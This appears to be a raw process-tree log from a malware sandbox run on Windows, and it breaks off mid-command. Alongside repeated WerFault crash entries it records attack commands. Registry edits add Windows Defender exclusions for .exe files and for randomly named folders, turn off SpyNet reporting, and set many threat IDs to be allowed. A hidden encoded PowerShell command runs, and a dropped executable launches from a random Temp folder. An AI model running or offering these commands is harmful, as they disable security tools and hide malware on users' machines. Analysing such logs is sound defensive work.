C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1044 -ip 1044
1⤵
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1044 -ip 1044
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1044 -ip 1044
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1044 -ip 1044
1⤵
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1044 -ip 1044
1⤵
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1044 -ip 1044
1⤵
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1044 -ip 1044
1⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1044 -ip 1044
1⤵
PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1044 -ip 1044
1⤵
PID:956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1044 -ip 1044
1⤵
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1044 -ip 1044
1⤵
PID:1824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1044 -ip 1044
1⤵
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1044 -ip 1044
1⤵
PID:3140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1044 -ip 1044
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1044 -ip 1044
1⤵
PID:1040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1044 -ip 1044
1⤵
PID:2624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1044 -ip 1044
1⤵
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1044 -ip 1044
1⤵
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1044 -ip 1044
1⤵
PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1044 -ip 1044
1⤵
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1044 -ip 1044
1⤵
PID:984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1044 -ip 1044
1⤵
PID:404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1044 -ip 1044
1⤵
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1044 -ip 1044
1⤵
PID:3520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1044 -ip 1044
1⤵
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1044 -ip 1044
1⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1044 -ip 1044
1⤵
PID:5716

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
1⤵
PID:5996

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
2⤵
PID:5184

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
2⤵
PID:5168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause Zerkalo331
1⤵
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1044 -ip 1044
1⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1044 -ip 1044
1⤵
PID:3008

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
1⤵
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1044 -ip 1044
1⤵
PID:5524

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
1⤵
PID:2452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1044 -ip 1044
1⤵
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1044 -ip 1044
1⤵
PID:5872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1044 -ip 1044
1⤵
PID:5004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6124

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1044 -ip 1044
1⤵
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1044 -ip 1044
1⤵
PID:5176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1044 -ip 1044
1⤵
PID:5152

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1044 -ip 1044
1⤵
PID:5416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1044 -ip 1044
1⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1044 -ip 1044
1⤵
PID:3464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1044 -ip 1044
1⤵
PID:5512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1044 -ip 1044
1⤵
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1044 -ip 1044
1⤵
PID:1276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb8c809758,0x7ffb8c809768,0x7ffb8c809778
2⤵
PID:5232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1868 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:2
2⤵
PID:2156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:2008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3200 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:1
2⤵
PID:4084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3328 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:1
2⤵
PID:4744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4532 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:1
2⤵
PID:5196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4560 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:5128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4828 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:5368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:4660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:2148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:6016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4708 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:1
2⤵
PID:1660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3928 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:1
2⤵
PID:5660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3440 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:4064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 --field-trial-handle=1880,i,11934140882987285130,9046856674652327842,131072 /prefetch:8
2⤵
PID:4528

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2220

C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\mIwgqVf.exe
C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\mIwgqVf.exe js /site_id 690689 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:960

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5336

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:4408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:5764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:5324

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:5436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:5624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:5732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:5284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:5796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:5692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:3828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:2012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:3496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:4820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaGkFfZLSayRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaGkFfZLSayRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JGBawXrjoobU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JGBawXrjoobU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 